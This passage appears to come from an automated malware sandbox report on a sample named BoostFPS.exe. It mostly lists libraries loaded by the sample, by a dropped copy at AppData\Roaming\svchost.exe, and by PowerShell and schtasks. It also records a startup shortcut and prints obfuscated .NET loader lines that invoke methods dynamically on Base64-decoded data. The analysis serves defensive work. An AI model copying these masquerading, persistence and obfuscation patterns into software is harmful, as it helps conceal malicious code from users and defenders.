                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                  Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\BoostFPS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: svchost.lnk.4.drLNK file: ..\..\..\..\..\svchost.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\BoostFPS.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: BoostFPS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: BoostFPS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{b43LsePgKro8PAKsdWFwSRgXeS.ldbGRoDG4YflBvo1GqKNT8Ob7E,b43LsePgKro8PAKsdWFwSRgXeS._2yIMq7mdYoiSGzfjwifyX4cwzH,b43LsePgKro8PAKsdWFwSRgXeS.tgJNXlZgkSZOYf9AvkPdJ0ytaJ,b43LsePgKro8PAKsdWFwSRgXeS.brPiHMEBQvCGzrgJTWhfmTwx6s,cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.o2A5mxiy7d62WaZnPy3GmxAsRz4ZpWJ3M0mw()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WknvkUhNjgPqC1mZJN[2],cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.mMqBTb0LofCXALp773iWGGxrcYL8iOf1lz9TVkF9im1QHSwy2Qp6C84sN6cAiR81JcxH(Convert.FromBase64String(WknvkUhNjgPqC1mZJN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{b43LsePgKro8PAKsdWFwSRgXeS.ldbGRoDG4YflBvo1GqKNT8Ob7E,b43LsePgKro8PAKsdWFwSRgXeS._2yIMq7mdYoiSGzfjwifyX4cwzH,b43LsePgKro8PAKsdWFwSRgXeS.tgJNXlZgkSZOYf9AvkPdJ0ytaJ,b43LsePgKro8PAKsdWFwSRgXeS.brPiHMEBQvCGzrgJTWhfmTwx6s,cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.o2A5mxiy7d62WaZnPy3GmxAsRz4ZpWJ3M0mw()}}, (string[])null, (Type[])null, (bool[])null, true)
